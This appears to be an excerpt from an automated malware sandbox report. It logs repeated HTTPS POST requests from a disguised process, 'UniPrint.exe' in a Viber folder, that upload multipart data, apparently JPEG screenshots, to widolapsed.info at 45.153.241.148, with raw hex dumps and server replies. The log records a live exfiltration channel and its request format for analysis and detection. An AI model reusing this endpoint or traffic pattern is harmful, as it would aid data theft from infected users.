                                                                                                      2021-09-15 11:46:18 UTC1625OUTData Raw: ab 48 c9 c5 3c 46 e7 80 a4 fe 15 a2 75 2d 3e 3f f5 76 a4 fd 69 0e b8 17 fd 55 ac 63 eb 47 b4 a8 f6 88 7b 0a 6b 79 15 16 d2 76 e9 19 fc aa dd a6 9b 71 e6 86 28 7a d4 6d ae dd 1f ba 11 7e 82 98 9a ad e3 c8 b9 94 e0 9e c2 a6 4a b3 46 94 d5 08 c9 6e cb 9e 33 5d b0 da 83 e9 5c be 9f ff 00 21 1b 7f fa e8 b5 d3 78 c4 96 b6 b4 27 a9 5a e6 74 ff 00 f9 08 db ff 00 d7 41 fc e9 61 ff 00 80 75 d6 fe 31 e8 5a 8a 5b 99 83 4d 28 53 8e 95 48 cd a6 c7 d5 c9 aa de 24 24 5e ae 0f f0 d6 2f 5e f5 85 0a 1c d0 4d b2 71 38 ce 4a 8e 2a 27 40 75 3d 3d 3e e4 44 d3 0e b9 12 ff 00 ab b7 15 85 45 6e b0 b0 ea 72 3c 7d 5e 86 c3 6b f3 7f 04 6a 2a 07 d6 6e db a3 63 e9 59 d4 55 2c 3d 35 d0 c9 e2 eb 3e a5 b6 d4 2e 5f ef 4a df 9d 37 ce 91 ba b9 3f 8d 57 a7 2d 5f b3 8a d9 12 ab 4d ee c9 77 13
                                                                                                      Data Ascii: H<Fu->?viUcG{kyvq(zm~JFn3]\!x'ZtAau1Z[M(SH$$^/^Mq8J*'@u==>DEnr<}^kj*ncYU,=5>._J7?W-_Mw
                                                                                                      2021-09-15 11:46:18 UTC1641OUTData Raw: 16 92 96 8a 00 4a 28 a2 80 0a 28 a2 80 16 8a 4a 28 01 69 69 b4 b4 08 5a 4a 28 a0 05 cd 14 94 50 02 d1 49 45 00 2d 14 51 40 0b 45 25 2d 31 05 2d 25 14 c0 28 a2 8a 40 14 51 45 00 14 51 45 00 14 b4 94 50 02 d1 49 4b 4c 02 8a 28 a0 42 d1 49 45 00 2d 14 94 50 02 d1 49 45 00 2d 14 51 40 05 14 51 4c 42 d2 51 45 00 2d 14 51 40 05 14 51 40 05 14 51 40 0b 45 20 a5 a6 20 a5 a4 a3 34 00 b4 52 66 8a 00 5a 33 49 45 00 2e 68 a4 a5 a0 41 45 14 50 01 4b 49 4b 4c 02 96 92 8a 00 5e f4 51 45 00 14 52 52 d3 01 68 a4 a2 81 0b 45 25 2d 00 2d 14 94 53 10 b4 51 45 00 2d 25 19 a2 80 16 8a 28 a0 02 96 92 8a 00 5a 05 25 2d 31 0b 46 69 28 a6 21 73 46 69 28 a0 07 66 8a 6d 2d 17 0b 0b 46 69 33 49 9a 2e 16 1d 9a 33 4d cd 14 5c 2c 3f 34 66 9b 46 69 dc 56 1d 9a 4c d3 69 73 4a e3 b0 b9 a5
                                                                                                      Data Ascii: J((J(iiZJ(PIE-Q@E%-1-%(@QEQEPIKL(BIE-PIE-Q@QLBQE-Q@Q@Q@E 4RfZ3IE.hAEPKIKL^QERRhE%--SQE-%(Z%-1Fi(!sFi(fm-Fi3I.3M\,?4fFiVLisJ
                                                                                                      2021-09-15 11:46:18 UTC1652OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 33 35 33 39 36 34 37 39 35 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2353964795--
                                                                                                      2021-09-15 11:46:20 UTC1652INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:18 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=cccd4b3373be03a41cb894397280793c16c6b5037f01659ae4fbb150b2220f5e; expires=Thu, 15-Sep-2022 11:46:18 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:20 UTC1652INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      21192.168.2.34980845.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:21 UTC1652OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76644
                                                                                                      Content-Type: multipart/form-data; boundary=--------2524520363
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:21 UTC1653OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 35 32 34 35 32 30 33 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2524520363Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:21 UTC1653OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 9c d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:21 UTC1653OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:21 UTC1669OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:21 UTC1685OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:21 UTC1701OUTData Raw: 7e 94 79 ba 44 7f de 7a 5e df b2 65 2c 33 ea d2 32 71 4f 11 b9 e0 29 3f 85 68 9d 4b 4f 8f fd 5d a9 3f 5a 43 ae 05 ff 00 55 6b 18 fa d1 ed 2a 3d a2 1e c2 9a de 45 45 b4 9d ba 46 7f 2a b7 69 a6 dc 79 a1 8a 1e b5 1b 6b b7 47 ee 84 5f a0 a6 26 ab 78 f2 2e 65 38 27 b0 a9 92 ac d1 a5 35 42 32 5b b2 e7 8c d7 6c 36 a0 fa 57 2f a7 ff 00 c8 46 df fe ba 2d 74 de 31 25 ad ad 09 ea 56 b9 9d 3f fe 42 36 ff 00 f5 d0 7f 3a 58 7f e0 1d 75 bf 8c 7a 16 a2 96 e6 60 d3 4a 14 e3 a5 52 33 69 b1 f5 72 6a b7 89 09 17 ab 83 fc 35 8b d7 bd 61 42 87 34 13 6c 9c 4e 33 92 a3 8a 89 d0 1d 4f 4f 4f b9 11 34 c3 ae 44 bf ea ed c5 61 51 5b ac 2c 3a 9c 8f 1f 57 a1 b0 da fc df c1 1a 8a 81 f5 9b b6 e8 d8 fa 56 75 15 4b 0f 4d 74 32 78 ba cf a9 6d b5 0b 97 fb d2 b7 e7 4d f3 a4 6e ae 4f e3 55 e9
                                                                                                      Data Ascii: ~yDz^e,32qO)?hKO]?ZCUk*=EEF*iykG_&x.e8'5B2[l6W/F-t1%V?B6:Xuz`JR3irj5aB4lN3OOO4DaQ[,:WVuKMt2xmMnOU
                                                                                                      2021-09-15 11:46:21 UTC1717OUTData Raw: 28 a0 02 8a 28 a0 05 a2 92 8a 00 5a 5a 6d 2d 02 16 92 8a 28 01 73 45 25 14 00 b4 52 51 40 0b 45 14 50 02 d1 49 4b 4c 41 4b 49 45 30 0a 28 a2 90 05 14 51 40 05 14 51 40 05 2d 25 14 00 b4 52 52 d3 00 a2 8a 28 10 b4 52 51 40 0b 45 25 14 00 b4 52 51 40 0b 45 14 50 01 45 14 53 10 b4 94 51 40 0b 45 14 50 01 45 14 50 01 45 14 50 02 d1 48 29 69 88 29 69 28 cd 00 2d 14 99 a2 80 16 8c d2 51 40 0b 9a 29 29 68 10 51 45 14 00 52 d2 52 d3 00 a5 a4 a2 80 17 bd 14 51 40 05 14 94 b4 c0 5a 29 28 a0 42 d1 49 4b 40 0b 45 25 14 c4 2d 14 51 40 0b 49 46 68 a0 05 a2 8a 28 00 a5 a4 a2 80 16 81 49 4b 4c 42 d1 9a 4a 29 88 5c d1 9a 4a 28 01 d9 a2 9b 4b 45 c2 c2 d1 9a 4c d2 66 8b 85 87 66 8c d3 73 45 17 0b 0f cd 19 a6 d1 9a 77 15 87 66 93 34 da 5c d2 b8 ec 2e 69 73 4d a4 cd 17 0b 0e
                                                                                                      Data Ascii: ((ZZm-(sE%RQ@EPIKLAKIE0(Q@Q@-%RR(RQ@E%RQ@EPESQ@EPEPEPH)i)i(-Q@))hQERRQ@Z)(BIK@E%-Q@IFh(IKLBJ)\J(KELffsEwf4\.isM
                                                                                                      2021-09-15 11:46:21 UTC1727OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 35 32 34 35 32 30 33 36 33 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2524520363--
                                                                                                      2021-09-15 11:46:22 UTC1727INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:21 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=0a1359b7bbe6a79ffa13d42f37651f5ad2e4faae1badc096f3d704d7a9b1f5e9; expires=Thu, 15-Sep-2022 11:46:22 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:22 UTC1728INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      22192.168.2.34980945.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:23 UTC1728OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76647
                                                                                                      Content-Type: multipart/form-data; boundary=--------776738021
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:23 UTC1728OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 37 37 36 37 33 38 30 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------776738021Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:23 UTC1728OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 91 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:23 UTC1728OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:23 UTC1744OUTData Raw: b2 45 35 e3 1a f7 fc 8c 1a 97 fd 7d 4b ff 00 a1 9a f6 65 35 e3 3a f7 fc 8c 1a 97 fd 7d 4b ff 00 a1 9a f4 32 cf 8a 47 2e 2f 64 50 a5 a4 a5 af 64 e2 0a 31 45 14 08 31 5e 9f f0 a7 8d 26 fb fe bb 8f fd 06 bc c2 bd 3b e1 57 fc 82 6f bf eb b8 ff 00 d0 6b 3a bf 09 a5 3f 88 ee a9 2b 26 c6 d6 07 d2 6d ae 6e 67 ba cb 40 b2 48 e6 ee 50 3e e8 24 fd ea b2 96 16 b2 46 af 1c d7 4c ac 32 08 bc 97 04 7f df 55 8b 8c 53 df f0 ff 00 82 68 a5 26 b6 fc 7f e0 15 35 48 2d 6e d2 ea d2 f6 09 24 8e 56 07 88 99 bf 85 46 41 03 af 15 e4 3a fe 97 fd 91 aa 3d a8 72 e9 8d c8 59 4a 9c 1f 50 7b d7 b2 4b 6c b6 b7 96 26 19 2e 3e 79 8a b0 7b 87 70 47 96 e7 a1 24 75 02 bc d7 e2 47 fc 8d 6f ff 00 5c 53 f9 55 c1 59 e9 d4 99 bb ad 7a 1c 9d 25 3b 02 93 15 b5 8c 84 a2 97 14 60 d0 01 de 8a 39 a2 80
                                                                                                      Data Ascii: E5}Ke5:}K2G./dPd1E1^&;Wok:?+&mng@HP>$FL2USh&5H-n$VFA:=rYJP{Kl&.>y{pG$uGo\SUYz%;`9
                                                                                                      2021-09-15 11:46:23 UTC1760OUTData Raw: a4 a2 8a d4 c4 5a 29 29 68 00 a2 8a 28 10 b4 52 52 d2 00 a2 8a 28 10 52 d2 52 d2 00 a5 a4 a5 14 08 51 4b 49 4b 48 42 d5 88 1b a0 aa d5 35 bf de a8 96 c6 94 9d a4 6b ea c7 1e 1a 1e ed 5c 4b f5 ae cf 59 e3 c3 49 fe f5 71 6e 79 ac 70 bf 03 f5 3d 4a ff 00 1a f4 3b d1 c7 87 6c be 82 a8 e6 ae b7 1e 1f b1 1f ec 8f e5 54 6b 9e 8f 5f 53 4c 43 f7 97 a0 b9 a3 34 94 95 b1 cf 71 d9 a5 0d 4d 14 51 60 4c 7e 4d 3b 71 f5 a6 0a 5a 96 8b 4d 92 06 34 e0 c6 a2 14 ec d4 b4 52 93 25 0e 7d 69 c2 66 1d 18 d4 20 d2 d4 b8 a2 d4 d9 69 6e 64 1f c4 6a 55 bc 71 d7 06 a9 03 4e cd 43 a7 13 45 56 45 f1 79 fd e5 06 97 cf 85 be f4 62 a8 66 94 31 a9 74 91 6a ab 2f 6d b4 7e a9 8a 4f b1 da 37 43 8a aa 18 d3 83 1a 9e 56 b6 65 29 c5 ee 89 4e 99 19 fb af 4c 6d 2d bf 85 c1 a0 39 ec 4d 48 26 71 fc
                                                                                                      Data Ascii: Z))h(RR(RRQKIKHB5k\KYIqnyp=J;lTk_SLC4qMQ`L~M;qZM4R%}if indjUqNCEVEybf1tj/m~O7CVe)NLm-9MH&q
                                                                                                      2021-09-15 11:46:23 UTC1776OUTData Raw: 0c fa b4 8c 9c 53 c4 6e 78 0a 4f e1 5a 27 52 d3 e3 ff 00 57 6a 4f d6 90 eb 81 7f d5 5a c6 3e b4 7b 4a 8f 68 87 b0 a6 b7 91 51 6d 27 6e 91 9f ca ad da 69 b7 1e 68 62 87 ad 46 da ed d1 fb a1 17 e8 29 89 aa de 3c 8b 99 4e 09 ec 2a 64 ab 34 69 4d 50 8c 96 ec b9 e3 35 db 0d a8 3e 95 cb e9 ff 00 f2 11 b7 ff 00 ae 8b 5d 37 8c 49 6b 6b 42 7a 95 ae 67 4f ff 00 90 8d bf fd 74 1f ce 96 1f f8 07 5d 6f e3 1e 85 a8 a5 b9 98 34 d2 85 38 e9 54 8c da 6c 7d 5c 9a ad e2 42 45 ea e0 ff 00 0d 62 f5 ef 58 50 a1 cd 04 db 27 13 8c e4 a8 e2 a2 74 07 53 d3 d3 ee 44 4d 30 eb 91 2f fa bb 71 58 54 56 eb 0b 0e a7 23 c7 d5 e8 6c 36 bf 37 f0 46 a2 a0 7d 66 ed ba 36 3e 95 9d 45 52 c3 d3 5d 0c 9e 2e b3 ea 5b 6d 42 e5 fe f4 ad f9 d3 7c e9 1b ab 93 f8 d5 7a 72 d5 fb 38 ad 91 2a b4 de ec 97
                                                                                                      Data Ascii: SnxOZ'RWjOZ>{JhQm'nihbF)<N*d4iMP5>]7IkkBzgOt]o48Tl}\BEbXP'tSDM0/qXTV#l67F}f6>ER].[mB|zr8*
                                                                                                      2021-09-15 11:46:23 UTC1792OUTData Raw: 30 16 8a 4a 28 01 69 29 68 a0 04 a2 8a 28 00 a2 8a 28 01 68 a4 a2 80 16 96 9b 4b 40 85 a4 a2 8a 00 5c d1 49 45 00 2d 14 94 50 02 d1 45 14 00 b4 52 52 d3 10 52 d2 51 4c 02 8a 28 a4 01 45 14 50 01 45 14 50 01 4b 49 45 00 2d 14 94 b4 c0 28 a2 8a 04 2d 14 94 50 02 d1 49 45 00 2d 14 94 50 02 d1 45 14 00 51 45 14 c4 2d 25 14 50 02 d1 45 14 00 51 45 14 00 51 45 14 00 b4 52 0a 5a 62 0a 5a 4a 33 40 0b 45 26 68 a0 05 a3 34 94 50 02 e6 8a 4a 5a 04 14 51 45 00 14 b4 94 b4 c0 29 69 28 a0 05 ef 45 14 50 01 45 25 2d 30 16 8a 4a 28 10 b4 52 52 d0 02 d1 49 45 31 0b 45 14 50 02 d2 51 9a 28 01 68 a2 8a 00 29 69 28 a0 05 a0 52 52 d3 10 b4 66 92 8a 62 17 34 66 92 8a 00 76 68 a6 d2 d1 70 b0 b4 66 93 34 99 a2 e1 61 d9 a3 34 dc d1 45 c2 c3 f3 46 69 b4 66 9d c5 61 d9 a4 cd 36 97
                                                                                                      Data Ascii: 0J(i)h((hK@\IE-PERRRQL(EPEPKIE-(-PIE-PEQE-%PEQEQERZbZJ3@E&h4PJZQE)i(EPE%-0J(RRIE1EPQ(h)i(RRfb4fvhpf4a4EFifa6
                                                                                                      2021-09-15 11:46:23 UTC1803OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 37 37 36 37 33 38 30 32 31 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------776738021--
                                                                                                      2021-09-15 11:46:24 UTC1803INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:23 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=611eb500e3cd466317a7d1467f6c9f79b81c01c0b4da1e826c2a40a9d27d251e; expires=Thu, 15-Sep-2022 11:46:23 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:24 UTC1803INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      23192.168.2.34981045.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:24 UTC1803OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76598
                                                                                                      Content-Type: multipart/form-data; boundary=--------1255899435
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:24 UTC1804OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 32 35 35 38 39 39 34 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1255899435Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:24 UTC1804OUTData Raw: 7f 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 e4 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee 98 ef 4d 77 7d 78 7d 40 d3 6d 60 3b ea 5f 32 bb b0
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[DMw}x}@m`;_2
